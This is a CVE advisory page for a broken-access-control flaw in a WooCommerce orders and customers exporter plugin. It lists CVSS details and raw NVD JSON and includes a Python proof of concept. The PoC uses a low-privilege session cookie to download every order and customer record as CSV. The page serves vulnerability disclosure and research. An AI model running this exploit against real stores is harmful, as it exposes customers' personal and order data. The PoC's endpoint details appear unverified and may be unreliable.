Security Vulnerability Report
中文
CVE-2025-53424 CVSS 6.5 MEDIUM

CVE-2025-53424

Published: 2025-10-22 15:15:51
Last Modified: 2026-04-27 18:16:22

Description

Missing Authorization vulnerability in vanquish WooCommerce Orders & Customers Exporter woocommerce-orders-ei allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Orders & Customers Exporter: from n/a through <= 5.4.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

woocommerce-orders-ei < 5.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-53424 PoC - WooCommerce Orders Exporter Broken Access Control # Target: WordPress site with vulnerable woocommerce-orders-ei plugin (<=5.4) # This PoC demonstrates how low-privilege users can export sensitive data TARGET_URL = "http://target-wordpress-site.com" # Authenticated low-privilege user session COOKIES = { 'wordpress_test_cookie': 'WP+Cookie+check', 'wordpress_logged_in_user': 'user_session_cookie_here' } def export_orders(): """Export all WooCommerce orders without proper authorization""" endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Trigger order export - missing capability check params = { 'action': 'wc_customer_export_download', 'download_type': 'order', 'format': 'csv' } print("[*] Attempting to export WooCommerce orders...") try: response = requests.get(endpoint, params=params, cookies=COOKIES, timeout=30) if response.status_code == 200 and 'text/csv' in response.headers.get('Content-Type', ''): print("[+] SUCCESS: Orders exported without proper authorization!") print(f"[+] Downloaded {len(response.content)} bytes of data") # Save the exported data with open('exported_orders.csv', 'wb') as f: f.write(response.content) print("[+] Data saved to exported_orders.csv") return True else: print(f"[-] Failed: Status {response.status_code}") return False except Exception as e: print(f"[-] Error: {str(e)}") return False def export_customers(): """Export all WooCommerce customer data without proper authorization""" endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" params = { 'action': 'wc_customer_export_download', 'download_type': 'customer', 'format': 'csv' } print("[*] Attempting to export WooCommerce customer data...") try: response = requests.get(endpoint, params=params, cookies=COOKIES, timeout=30) if response.status_code == 200 and 'text/csv' in response.headers.get('Content-Type', ''): print("[+] SUCCESS: Customer data exported!") with open('exported_customers.csv', 'wb') as f: f.write(response.content) print("[+] Data saved to exported_customers.csv") return True except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) > 1: TARGET_URL = sys.argv[1] print(f"[*] Target: {TARGET_URL}") print("[*] CVE-2025-53424 PoC - WooCommerce Orders Exporter <= 5.4") export_orders() export_customers()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53424", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:50.727", "lastModified": "2026-04-27T18:16:21.820", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in vanquish WooCommerce Orders & Customers Exporter woocommerce-orders-ei allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WooCommerce Orders & Customers Exporter: from n/a through <= 5.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woocommerce-orders-ei/vulnerability/wordpress-woocommerce-orders-customers-exporter-plugin-5-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}